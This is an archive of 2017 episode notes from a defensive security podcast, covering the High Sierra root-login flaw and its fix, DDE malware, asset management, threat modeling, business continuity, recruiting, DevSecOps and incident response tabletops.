Expensify is global, and could have wide reaching effects for this new ‘feature’...
Expensify used Mechanical Turk, a ‘human intelligence tasks’
Micropayments to do menial tasks
Example of why periodic review of your 3rd parties is necessary
New ‘features’ = new nightmares
Privacy requirements change
Functionality not in alignment with your business goals
Apple ‘passwordless root’
HIgh Sierra before today (29 November 2017) had the ability to login as root with no password…
That is a problem… Original Tweet: https://twitter.com/lemiorhan/status/935578694541770752
It also works on remote services, like ARD (apple remote desktop), and file shares…
Rolling IR
Was it necessary?
Serious, yes
Was discovered two weeks prior https://forums.developer.apple.com/thread/79235
Dev (chethan177) on the forum “didn’t realize it was a security issue”
Easy enough fix (Bryan IR story)
Open Terminal
Sudo passwd root
Change password
Do you trust users to do that? Not across a large enterprise
Published on: November 30, 2017
2017-039-creating custom training for your org, and audio from SANS Berlin!
This week is a bit of a short show, as Ms. Berlin and Mr. Boettcher are out this week for the holiday.
I wanted to talk about something that I've started doing at work... Creating training... custom training that can help your org get around the old style training.
Also, we got some community audio from one of our listeners! "JB" went to a SANS event in Berlin, Germany a few weeks ago, and talked to some attendees, as well as Heather Mahalick (@HeatherMahalik), instructor of the FOR585 FOR585: Advanced Smartphone Forensics"
Take a listen and we hope you enjoy it!
Direct Link: https://brakesec.com/2017-039
RSS: https://brakesec.com/BrakesecRSS
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Sign up at
or DM us on Twitter, or email us.
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
---Show notes (from Bryan and JB)---
Ms. Berlin in New Zealand
Mr. Boettcher with the family
Training
What makes us despise training so much?
Cookie cutter
Scenarios do not match environments
Speaking is a little too perfect
Flash based
UI is horrible
Outdated
Easy questions
Infosec training is worse
2 hours of training each year
Not effective
Why not make your own?
Been doing it at work
No more than 7 minutes
Custom made
Tailored for your own company
Do you training like a talk at a con
Time limit: 7 (no more than 10 minutes)
Create some slides (5-7 slides)
Do it on a timely topic
Recent tabletop exercise results
Recent incident response
Phishing campaign
Script or no-script required
Sometimes talking plainly can be enough
https://screencast-o-matic.com/ - Windows (free version is 7 minutes long)
Quicktime - OSX (free) (Screenflow)
Handbrake (convert to MKV or MP4)
Microphone (can use internal microphones if you have a quiet place)
[begin notes: SANS Berlin REMOTE segment]
corresp. JB
reach jb at
(@cherokeejb_) on brakesec slack, twitter, & infosec.exchange
--link to all trainers and info from archive SANS Berlin 2017 https://www.sans.org/event/berlin-2017/
--pre-NetWars chat with the SEC 503 class:
-what do you like about SANS conference
-european privacy laws, even country to country!
-biggest priority for next year: building a SOC, working together with sales, asset management, constant improvement, password reuse
--special BrakeSec members only cameo
--“bring your own device” interview with an Information Security/forensics professional
password elimination or no reuse
--interview with Heather Mahalik (@HeatherMahalik)
Bio https://www.sans.org/instructors/heather-mahalik
-“game over” whatsapp, unpatched android, other known-historically weak tools as “assume breach of mobile”
-interesection of network forensics and mobile
-open source tools and the lack of, how to judge your tools
-Heather’s recent blog
-getting into mobile, decompiling, etc.
-number one topic for next year: encryption for Andriod 8 Oreo, iOS 12
-“most popular android is still v4.4”
Heather’s blog we mentioned
http://smarterforensics.com
link to the book Heather mentioned:
https://www.amazon.com/Practical-Mobile-Forensics-Heather-Mahalik/dp/1786464209/
--link to blog mentioned, jb’s initial reflections on SEC 503
https://www.linkedin.com/pulse/whaaaa0101-0000-0011t-aka-extracting-files-out-pcaps-foremost
JBs blog main link, or if you’re not a fan of linkedin
https://cherokeejb.blogspot.de/
small featured music clips used with permission from YGAM Records, Berlin
“Ж” by the artist Ōtone (Pablo Discerens), (c)(p)2016
Get it for free or donate at http://ygam.bandcamp.com !
book club EMEA!:
message JB or David (@dpcybuck) or any of us on brakesec slack if you want to take part in the book club conversations live, but can’t make the main call !
--
-
[end segment]
Published on: November 23, 2017
2017-038- Michael De Libero discusses building out your AppSec Team
Direct Link: https://brakesec.com/2017-038
Michael De Libero spends his work hours running an application security team at a gaming development company. I (Bryan) was really impressed at the last NCC Group Quarterly meetup when he gave a talk (not recorded) about how to properly build out your Application Security Team.
So I asked him on, and we went over the highlights of his talk. Some of the topics included:
Discussing with management your manpower issues
Who to include in your team
Communication between teams
RSS: https://brakesec.com/BrakesecRSS
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://brakesec.com/BDSiTunes
#Google Play Store: https://brakesec.com/BDS-GooglePlay
Our main site: https://brakesec.com/bdswebsite
Join our #Slack Channel! Sign up at
or DM us on Twitter, or email us.
#iHeartRadio App: https://brakesec.com/iHeartBrakesec
#SoundCloud: https://brakesec.com/SoundcloudBrakesec
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://brakesec.com/BDSPatreon
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://brakesec.com/BDS-PlayerFM
#Stitcher Network: https://brakesec.com/BrakeSecStitcher
#TuneIn Radio App: https://brakesec.com/TuneInBrakesec
----SHOW NOTES:
Amanda’s appearance on PSW
Building an AppSec Team - Michael de Libero (@noskillz)
https://techbeacon.com/owasp-top-ten-update-what-your-security-team-needs-know\
https://www.owasp.org/index.php/OWASP_AppSec_Pipeline
Need link to Michael’s slides -- https://docs.google.com/presentation/d/1Bvl2rybuWMdOu3cs03U85zwAvrM1RNxv99Dt-YiGiys/edit?usp=sharing
Random Notes from Mike:
- Hiring
- WebApps vs More traditional apps
-
- Release cycles differ
- Tech stacks can often differ
- Orgs are different
- Etc…
- Testing-focus vs. “security health”
- Role of management
-
- Managing a “remote” team
- Handling incoming requests from other teams
How do you sell a company on having an appsec team if they don’t have one?
If you have an existing ‘security team’, how easily is it to augment that into an appsec team?
Can you do job rotation with some devs?
Do devs care enough to want to do code audits
“That’s not in my job description”
Skills needed in an appsec team
Does it depend on the tech used, or the tech you might use?
Internal security vs. consultants
Intro to RE course with Tyler Hudak
Bsides Wellington speaker Amanda Berlin
Published on: November 15, 20172017-037 - Asset management techniques, and it's importance, DDE malware
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-037-asset_management.mp3
We started off the show talking to Mr. Boettcher about what DDE is and how malware is using this super legacy Windows component (found in Windows 2) to propogate malware in MS Office docs and spreadsheets. We also talk about how to protect your Windows users from this.
We then get into discussing why it's so important to have proper asset management in place. Without knowing what is in your environment, you could suffer gaps in coverage of your anti-virus/EDR software, unable to patch systems properly and even make it easier for lateral movement.
Finally, we discuss our recent "Introduction to Reverse Engineering" course with Tyler Hudak (@secshoggoth), and Ms. Berlin's upcoming trip to New Zealand.
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.slack.com/join/shared_invite/enQtMjY2NDAyMzgxNjAwLWFjZTc1YzVlYWExM2U5ZjhiNDYwZTIzN2UxNjM1OWIwYzBkMjgzYmY4ZjA2MzViNzQ2ZTUzMGQ2YWYwYWY3NTM or DM us on Twitter, or email us.
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
SHOW NOTES:
Oreilly con report
Malware report from Mr. Boettcher
DDE (Dynamic Data Exchange), all the rage
https://en.wikipedia.org/wiki/Windows_2.0
http://home.bt.com/tech-gadgets/computing/10-facts-about-windows-2-11364027546216
https://www.ghacks.net/2017/10/23/disable-office-ddeauto-to-mitigate-attacks/
Why asset management?
Know what’s in your environment
CIS Top 20...no wait, it’s the TOP THREE of the 20.
It all builds on this…
Know what’s in your environment
https://metacpan.org/pod/App::Netdisco <- NetDisco (great for network equipment)
Where do you store that data? Or is it just enough to know where to get it?
Systems you can pull asset data from:
Patching systems
Chef
WSUS
FIM systems
Tripwire
DLP systems
Vuln Scanners
AV/EDR management
router/switch tables
DNS
Asset management systems are a gold mine for an attacker
Names
IPs
email addresses
Coverage gaps in these systems will cause you to lose asset visibility
http://www.businessinsider.com/programmer-automates-his-job-2015-11
Published on: November 8, 20172017-036-Adam Shostack talks about threat modeling, and how to do it properly
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-036-Adam_Shostack-threat_modeling.mp3
Adam Shostack has been a fixture of threat modeling for nearly 2 decades. He wrote the 'threat modeling' bible that many people consult when they need to do threat modeling properly.
We discuss the different threat modeling types (STRIDE, DREAD, Trike, PASTA) and which ones Adam enjoys using.
Mr. Boettcher asks how to handle when people believe an OS is better than another, how to do threat modeling to decide which OS should be the one to use.
Stay after for a special post-show discussion with Adam about his friend Stephen Toulouse (@stepto).
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
SHOW NOTES:
Ideas and suggestions here:
Start with “What is threat modeling?” What is it, why do people do it, why do organizations do it?
What happens when it’s not done effectively, or at all?
At what point in the SDLC should threat modeling be employed?
Planning?
Development?
Can threat models be modified when new features/functionality gets added?
Otherwise, are these just to ‘check a compliance box’?
Data flow diagram (example) -
process flow
External entities
Process
Multiple Processes
Data Store
Data Flow
Privilege Boundary
Classification of threats-
STRIDE - https://en.wikipedia.org/wiki/STRIDE_(security)
DREAD - https://en.wikipedia.org/wiki/DREAD_(risk_assessment_model)
PASTA - https://www.owasp.org/images/a/aa/AppSecEU2012_PASTA.pdf
Trike - http://octotrike.org/
https://en.wikipedia.org/wiki/Johari_window
Butler Lampson, Steve Lipner link: https://www.nist.gov/sites/default/files/documents/2016/09/16/s.lipner-b.lampson_rfi_response.pdf
Escalation Of Privilege card game: https://www.microsoft.com/en-us/download/details.aspx?id=20303
NIST CyberSecurity Framework: https://www.nist.gov/cyberframework
Data Classification Toolkit - https://msdn.microsoft.com/en-us/library/hh204743.aspx
Microsoft bug bar (security) - https://msdn.microsoft.com/en-us/library/windows/desktop/cc307404.aspx
Microsoft bug bar (privacy) - https://msdn.microsoft.com/en-us/library/windows/desktop/cc307403.aspx
OWASP threat Modeling page: https://www.owasp.org/index.php/Application_Threat_Modeling
OWASP Threat Dragon - https://www.owasp.org/index.php/OWASP_Threat_Dragon
Emergent Design: https://adam.shostack.org/blog/2017/10/emergent-design-issues/
Robert Hurlbut (workshop presenter at SourceCon Seattle) https://roberthurlbut.com/Resources/2017/NYMJCSC/Robert-Hurlbut-NYMJCSC-Learning-About-Threat-Modeling-10052017.pdf (much the same content as given at Source)
Adam’s Threat modeling book
http://amzn.to/2z2cNI1 -- sponsored link
Is the book still applicable?
New book
What traps do people fall into? Attacker-centered, asset-centered approaches
Close with “how do I get started on threat modeling?”
SecShoggoth’s Class “intro to Re”
Johari window? http://www.selfawareness.org.uk/news/understanding-the-johari-window-model
Published on: October 29, 20172017-SPECIAL004- SOURCE Conference Seattle 2017
After last year's SOURCE Conference, I knew I needed to go again, not just because it was a local (Seattle) infosec conference, but because of the caliber of speakers and the range of topics that were going to be covered.
I got audio from two of the speakers at the SOURCE conference (@sourceconf) on Twitter
Lee Fisher and Paul English from PreOS Security about UEFI security and methods to secure your devices https://preossec.com/
Joe Basirico discusses the proper environment to get the best out of your bug bounty program.
points from his abstract:
Bug Bounty Programs - Why you want to invite security researchers to hack your products
Marketing your Security Program - How and why to market your security program. What to say, how to say it, and where to say it for maximum effectiveness.
How to Communicate with Security Researchers - What are security researchers expecting in communication, responsiveness, transparency, and time to fix.
Source conference YouTube Channel: https://www.youtube.com/channel/UCAPQk1fH2A4pzYjwTCt5-dw/videos (2017 is not available yet, but all talk from 2008-2015 is available)
agenda of the talks that occurred at Source Seattle 2017
https://www.sourceconference.com/seattle-2017-agenda
https://www.sourceconference.com/copy-of-seattle-2016-agenda-details
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: October 22, 2017
2017-035-Business_Continuity-After_the_disaster
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-035-business_continuity-After_the_disaster.mp3
We are back this week after a bit of time off, and we getting right back into it...
What happens after you enact your business continuity plan? Many times, it can cause you to have to change processes, procedures... you may not even be doing business in the same country or datacenter, and you may be needing to change the way business is done.
We also talk a bit about 3rd party vendor reviews, and what would happen if your 3rd party doesn't have a proper plan in place.
Finally, we discuss the upcoming #reverseEngineering course starting on 30 October 2017 with Tyler Hudak, as well some upcoming appearances for Ms. Berlin at SecureWV, GrrCon, and Bsides Wellington, #newZealand
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
---SHOW NOTES---
You have enacted your BC/DR plan
Step 1. Panic
Step 2. Panic more, or let your management panic
Step 3. Follow the plan… you do have a plan, right?
Enacting a BC/DR plan
RPO/RTO - https://www.druva.com/blog/understanding-rpo-and-rto/
Recovery Point Objective (RPO) describes the interval of time that might pass during a disruption before the quantity of data lost during that period exceeds the Business Continuity Plan’s maximum allowable threshold or “tolerance.”
https://en.wikipedia.org/wiki/Recovery_point_objective
Recovery Time Objective (RTO) is the duration of time and a service level within which a business process must be restored after a disaster in order to avoid unacceptable consequences associated with a break in continuity.
https://en.wikipedia.org/wiki/Recovery_time_objective
Excerpt from "Defensive Security Handbook" -
Buy from Amazon (sponsored link): http://amzn.to/2zcmWBY
Recovery Point Objective
The recovery point objective (RPO) is the point in time that you wish to recover to. That is, determining if you need to be able to recover data right up until seconds before the disaster strikes, or whether the night before is acceptable, or the week before, for example. This does not take into account of how long it takes to make this recovery, only the point in time from which you will be resuming once recovery has been made. There is a tendency to jump straight to seconds before the incident; however, the shorter the RPO, the more the costs and complexity will invariably move upwards.
Recovery Time Objective
The recovery time objective (RTO) is how long it takes to recover, taken irrespective of the RPO. That is, after the disaster, how long until you have recovered to the point determined by the RPO.
To illustrate with an example, if you operate a server that hosts your brochureware website, the primary goal is probably going to be rapidly returning the server to operational use. If the content is a day old it is probably not as much of a problem as if the system held financial transactions whereby the availability of recent transactions is important. In this case an outage of an hour may be tolerable, with data no older than one day once recovered.
In this case the RPO would be one day, and the RTO would be one hour.
There is often a temptation for someone from a technology department to set these times; however, it should be driven by the business owners of systems. This is for multiple reasons:
- It is often hard to justify the cost of DR solutions. Allowing the business to set requirements, and potentially reset requirements if costs are too high, not only enables informed decisions regarding targets, but also reduces the chances of unrealistic expectations on recovery times.
- IT people may understand the technologies involved, but do not always have the correct perspective to make a determination as to what the business’ priorities are in such a situation.
- The involvement of the business in the DR and BCP plans eases the process of discussing budget and expectations for these solutions.
RPO should be determined when working through a Business impact analysis (BIA)
https://www.ready.gov/business-impact-analysis
https://www.fema.gov/media-library/assets/documents/89526
There is always a gap between the actuals (RTA/RPA) and objectives
After an incident or disaster, a ‘Lessons Learned’ should identify shortcomings and adjust accordingly.
This may also affect contracts, or customers may require re-negotiation of their RTO/RPO requirements
If something happens 4 hours after a backup, and you have an hour until the next backup, you have to reconcile the lost information, or take it as a loss
Loss = profits lost, fines for SLAs
You may not be doing the same after the disaster. New processes, procedures
Ms. Berlin’s appearances
Grrcon - http://grrcon.com/
Hack3rcon/SecureWV - http://securewv.com/
Oreilly Conference - https://conferences.oreilly.com/security/sec-ny/public/schedule/detail/61290
Experts Table?
Bsides Wellington (sold-out)
----
CLASS INFORMATION
Introduction to Reverse Engineering with Tyler Hudak
Starts on 30 October - 20 November
4 Mondays
Sign up on our Patreon (charged twice, half when you sign up, half again when 1 November happens
Published on: October 16, 20172017-SPECIAL003-Audio from Derbycon 2017!
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-SPECIAL003-Derbycon_audio.mp3
Mr. Boettcher, Ms. Berlin, and I went to Derbycon. In addition to the podcast with podcasters we did during the 3 days, I managed to grab another whole hour of audio from various people at the conference, just to give you an idea of the vibe of the conference, in case you were unable to attend.
We talked to the FOOOLs (http://www.bloomingtonfools.org/), and how they have done the lockpick village for the last 7 years.
We talk to Ms. Wynter (@sec_she_lady) about her experiences at her first Derbycon.
Mr. Matt Miller (@milhous30) talked about some of his #reverse #engineering challenges that were in the #Derbycon #CTF
Lots of great talks happened there this year, check them all out over on @irongeek's site (http://www.irongeek.com/i.php?page=videos/derbycon7/mainlist)
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: October 7, 2017
2017-034-Preston_Pierce, recruiting, job_descriptions
*Apologies for the continuity this was recorded before we went to Derbycon 2017.*
Preston Pierce is a recruiter. We wanted to have him on to discuss some issues with our industry. So we had him on to discuss hiring practices, how a recruiter can help a company recruiter better talent, and how to stop companies looking for the 'unicorn' candidate.
Preston is a great guy and we learned a lot about how the recruiting process works, and how Preston's company work differently from other, less reputable companies.
We also discuss job descriptions, getting management buy in for a good candidate, and more.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-034-Preston_Pierce_recruiting_job_descriptions.mp3
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Show Notes:
Blueteamers
Looking at job descriptions,
Fix if outdated or unnecessary
Managers
Be realistic about expectations
Recruiters
Better research of people
Discuss realistic demands from customers
You
Update your LinkedIn removing overly generalized terms (healthcare, for example)
When should you reach out to a recruiter? Right away? After you’ve already completed some leg work?
Companies do a poor job of marketing for their current openings.
Published on: October 2, 20172017-SPECIAL002-Derbycon-podcast with podcasters (NSF Kids/Work)
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-SPECIAL002-Derbycon-Podcast_with_podcasters.mp3
SUPER NOT SAFE for kids (and probably adults, come to think of it). Really this is just us riffing about derbycon (and I really love @oncee, and wished I'd gone to his stable talk (which you can listen/watch here: http://www.irongeek.com/i.php?page=videos/derbycon7/s07-the-skills-gap-how-can-we-fix-it-bill-gardner)
We actually did talk about the skills gap, resume workshop held at Derbycon, and so much else.
If you haven't been to Derbycon, you should definitely make plans now to attend...
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: http://www.youtube.com/c/BDSPodcast
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: September 27, 20172017-033- Zane Lackey, Inserting security into your DevOps environment
Zane Lackey (@zanelackey on Twitter) loves discussing how to make the DevOps, and the DevSecOps (or is it 'SecDevOps'... 'DevOpsSec'?)
So we talk to him about the best places to get the most bang for your buck getting security into your new DevOps environment. What is the best way to do that? Have a listen...
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-033-Zane_Lackey_inserting_security_into_your_DevOps.mp3
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
--SHOW NOTES--
Security shifts from being a gatekeeper to enabling teams to be secure by default
Require a culture shift
Should that be implemented before the shift to CI/CD, or are we talking ‘indiana jones and the rock in the temple’?
How?
Secure coding?
Hardening boxes/Systems?
If it’s just dev -> prod, where does security have the chance to find issues (i.e. test and QA belong there)?
We used to have the ability for a lot of security injection points, but no longer
Lowers the number of people we have to harangue to be secure…?
Security success = baked in to DevOps
Shift from a ‘top down’ to ‘bottom up’
Eliminate FPs, and forward on real issues to devs
Concentrate on one or two types of vulnerabilities
Triage vulns from most important to least important
Go for ‘quick wins’, or things that don’t take a lot of time for devs to fix.
Grepping for ‘system(), or execve()’
Primitives (hashing, encryption, file system operations)
How do you stop a build going to production if it’s going out like that?
Do we allow insecurity to go to Production?
Or would it be too late to ‘stop the presses’?
“We’ll fix it in post…”
Instead of the ‘guardrail not speedbump’ you are the driving instructor...
But where does security get in to be able to talk to devs about data flow, documentation of processes?
5 Y’s - Why are you doing that?
Setup things like alerting on git repos, especially for sensitive code
Changing a sensitive bit of code or file may notify people
Will make people think before making changes
Put controls in terms of how they enable velocity
You like you some bug bounties, why?
Continuous feedback
Learn to find/detect attackers as early in the attack chain
Refine your vuln triage/response
Use bug reports as IR/DFIR...
https://www.youtube.com/watch?v=ORtYTDSmi4U
https://www.slideshare.net/zanelackey/how-to-adapt-the-sdlc-to-the-era-of-devsecops
http://www.slideshare.net/zanelackey/building-a-modern-security-engineering-organization
In SAST, a modern way to decide what to test is start with a small critical vuln, like OS command injection. Find those and get people to fix it. BUT don’t developers or project teams get unhappy [sic] if you keep "moving the goal post" as you add in the next SAST test and the next SAST test. How do you do that and not piss people off?
[15:16]
How do you make development teams self sufficient when it comes to writing a secure application? Security is a road block during a 3 month release schedule….getting "security approval" in a 3 day release cycle is impossible.
[15:17]
But then…what is the job for the security team? If DevOps with security is done right, do you still need a security team, if so what do they do???? Do they write more code???
I don't think your Dev'ops'ing security out of a job...but where does security see itself in 5 years?
Last one if there is time and interest. If Zane Lackey was a _maintainer_ of an open source project, what dev ops sec lessons would he apply to that dev model…to the OpenSource model?
(We've got internal projects managed with the open source model...so im interested in this one)
Even with out any of those questions the topics he covered in his black hat talk are FULL of content to talk about. Heck, even bug bounties are a topic of conversation.
The idea of a feedback loop to dev...where an application under attack in a pen test can do fixes live....how that is possible is loads of content.
Published on: September 17, 2017
2017-032-incident response tabletops, equifax breach
Everyone should be doing incident response tabletops, even if it's not a dedicated task in your organization. It allows you to find out what you might be lacking in terms of processes, manpower, requirements, etc.
This week, we discuss what you need to do to get ready for one, and how those should go in terms of helping your organization understand how to handle the aftermath.
And in case you've been under a rock, #equifax was breached. 143 million credit records are in the ether. We discuss the facts as of 9 September 2017, and what this means to the average user.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-032-incident_response-equifax-done2.mp3
RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
---SHOW NOTES---
Incident response
Must go beyond ‘threats’.
What is in your environment
Struts aren’t a threat, or are they?
Equifax didn’t think so at the time…
Insider threat
External entities
Libraries
plugins/themes used (Wordpress)
Risk analysis
Qualitative
Quantitative
What makes a good incident response exercise (
Following the creation and implementation of security controls around use cases, can be the testing of tabletop exercises and drills as a proof of concept. A tabletop exercise is a meeting of key stakeholders and staff that walk step by step through the mitigation of some type of disaster, malfunction, attack, or other emergency in a low stress situation. A drill is when staff carries out as many of the processes, procedures, and mitigations that would be performed during one of the emergencies as possible.
While drills are limited in scope, they can be very useful to test specific controls for gaps and possible improvements. A disaster recovery plan can be carried out to some length, backups can be tested with the restoration of files, and services can be failed over to secondary cluster members.
Tabletop exercises are composed of several key groups or members.
